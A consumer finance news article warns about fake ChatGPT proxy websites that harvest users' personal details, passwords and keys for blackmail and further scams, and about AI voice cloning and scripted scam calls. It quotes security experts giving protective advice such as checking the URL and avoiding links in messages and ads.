finance

ChatGPT proxy scam warning as fraudsters steal personal details to blackmail victims


Scammers are taking advantage of the popularity of to dupe people into handing over personal details.

Ray Canzanese, director of Netskope Threat Labs, spoke to about how criminals create proxy imitations of the ChatGPT webpage, allowing them to see all the information the person is inputting into the AI-powered service.

He said: “The proxy, which now acts as a “man-in-the-middle” between the victim and ChatGPT, allows the scammer to see everything the victims send to ChatGPT – and all the responses returned by ChatGPT.

“Scammers do this to collect information about their victims that can be used to target them with additional scams.

“Suppose I used ChatGPT to edit an email to my financial planner and to research a medical condition I was just diagnosed with.

“The scammer now knows my financial situation and can target me with scams that prey on my medical condition.”

can also use any potentially embarrassing personal details to try and blackmail a person into sending them money.

The fraudsters can also harvest any passwords or keys sent to ChatGPT through the proxy sites under their control.

Mr Canzanese spoke about what people can do to avoid being taken in by the fake websites.

He said: “The approach is very similar to recognising phishing pages. ChatGPT is a product of OpenAI and the URL is chat.openai.com.

“If the page you visited has a different URL, it may be a scam. To avoid such scams, always browse directly to websites.

“Do not click on links that you receive via text message, email, or social media. Do not click on links in ads.”

Readers Also Like:  Thousands of households to get £125 cost of living cash direct to bank accounts before Christmas – are you eligible?

There is also the danger that AI tool such as ChatGPT could be used by scammers to proliferate their ploys and make them more convincing.

Chris Vaughan, vice president of the Technical Account Management at cybersecurity group Tanium, said ChatGPT can be used to write “convincing scripts” for scam phone calls.

He also said AI can be used for voice cloning to imitate a person’s voice when making a phone call.

He explained: “AI technology can mimic your voice, and replicate mannerisms with only 15 minutes of audio recording, making it indistinguishable from the real person.

“Imagine hearing a distressed relative’s voice through the phone, asking you to transfer them money.

“Adding a personal touch to scams has the potential to significantly increase the number of victims.”

Fortunately, there are things people can do to avoid being taken in by scam calls pretending to be from an organisation or from a loved one in need.

Mr Vaughan said: “Listen for unnatural pauses or a distorted voice quality. These can be signs of pre-recorded messages or voice synthesis software.

“If you hear these red flags, don’t be afraid to hang up – don’t stick around if it’s suspicious.”

Fraudsters can also use AI to create fake social media profiles that can look very convincing.

For the latest personal finance news, follow us on Twitter at @ExpressMoney_.



READ SOURCE

This website uses cookies. By continuing to use this site, you accept our use of cookies.